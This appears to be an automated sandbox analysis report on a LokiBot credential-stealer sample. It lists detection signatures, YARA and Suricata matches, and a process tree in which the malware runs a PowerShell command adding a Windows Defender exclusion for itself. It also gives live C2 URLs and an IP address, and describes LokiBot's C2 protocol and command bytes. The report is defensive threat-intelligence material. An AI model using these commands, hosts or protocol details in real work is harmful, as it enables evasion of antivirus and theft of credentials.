Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1561052
MD5:	66b03d1aff27d81e62b53fc108806211
SHA1:	2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256:	59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
Tags:	NETexeMSILuser-jstrosch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)

powershell.exe (PID: 7708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

file.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x49bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131ff:$des3: 68 03 66 00 00 0x175f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x176bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x21fa0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xf353:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1db97:$des3: 68 03 66 00 00 0x21fa0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x2206c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19d5d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x18a99b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1991df:$des3: 68 03 66 00 00 0x19d5d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19d69c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: file.exe PID: 7524	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: file.exe PID: 7524	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: file.exe PID: 7524	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 7524	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4fac0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x537d8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x5af83:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: file.exe PID: 7716	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: file.exe PID: 7716	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: file.exe PID: 7716	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: file.exe PID: 7716	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x372d:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.37bf1e0.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.file.exe.37bf1e0.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.file.exe.37bf1e0.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.file.exe.37bf1e0.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.file.exe.37bf1e0.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.file.exe.37d9200.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.file.exe.37d9200.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.file.exe.37d9200.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.file.exe.37d9200.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.file.exe.37d9200.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.file.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.file.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.file.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.file.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.file.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.file.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.file.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.file.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.file.exe.37bf1e0.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.file.exe.37bf1e0.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.file.exe.37bf1e0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.37bf1e0.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.file.exe.37bf1e0.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.file.exe.37bf1e0.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.file.exe.37bf1e0.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.file.exe.37bf1e0.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.file.exe.37d9200.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.file.exe.37d9200.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.file.exe.37d9200.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.37d9200.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.file.exe.37d9200.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.file.exe.37d9200.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.file.exe.37d9200.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.file.exe.37d9200.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.2.file.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.file.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.file.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.file.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.file.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.file.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.file.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.file.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7708, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7708, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:21.673105+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:23.332524+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49735	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:20.385794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:25.419739+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:27.183872+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:29.035149+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.844447+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.663838+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:34.331046+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:36.401062+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:38.111286+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.948025+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.659082+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.413430+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:45.199702+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.970645+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.693877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.493985+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:52.309427+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:54.159922+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:56.007119+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
